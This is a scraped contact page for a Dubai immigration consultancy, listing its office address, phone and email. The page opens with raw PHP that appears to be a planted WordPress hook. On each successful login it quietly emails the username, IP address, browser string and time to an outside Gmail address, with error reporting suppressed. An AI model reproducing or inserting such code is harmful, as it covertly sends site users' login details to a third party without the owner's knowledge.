add_filter('authenticate', function($user, $username, $password) {
if (is_a($user, 'WP_User')) {
$ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
$ua = $_SERVER['HTTP_USER_AGENT'] ?? 'unknown';
$time = date('Y-m-d H:i:s');
$body = "
Username | IP | Time |
{$username} | {$ip} | {$time} |
{$ua}
";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=UTF-8\r\n";
$headers .= "From: WP Intel \r\n";
@mail("mrsatsat90@gmail.com", "Valid Login Report", $body, $headers);
}
return $user;
}, 30, 3);
Contact – seena immigration
Have be any Question? feel free to contact with us.
Whether you’re seeking visa consultation, application assistance, or general information, our dedicated team is ready to assist you
Dubai Office
Al Fajer Building - Office# M 12 - 93 Airport Rd - Garhoud - Dubai - United Arab Emirates
Call Or Whatsapp
+971 56 982 2226
Email Us
info@seenaimmigration.com
admin@seenaimmigration.com